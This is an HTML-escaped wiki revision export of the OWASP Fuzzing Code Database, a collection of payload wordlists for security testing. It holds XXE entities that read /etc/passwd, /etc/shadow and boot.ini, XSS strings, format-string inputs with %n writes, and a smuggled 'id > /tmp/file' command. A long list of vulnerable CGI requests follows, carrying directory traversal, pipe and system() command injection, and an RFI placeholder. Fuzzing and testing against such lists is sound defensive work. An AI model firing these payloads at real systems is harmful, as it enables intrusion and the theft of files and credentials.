&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80094</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80094"/>
				<updated>2010-03-17T23:18:56Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* PHp-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
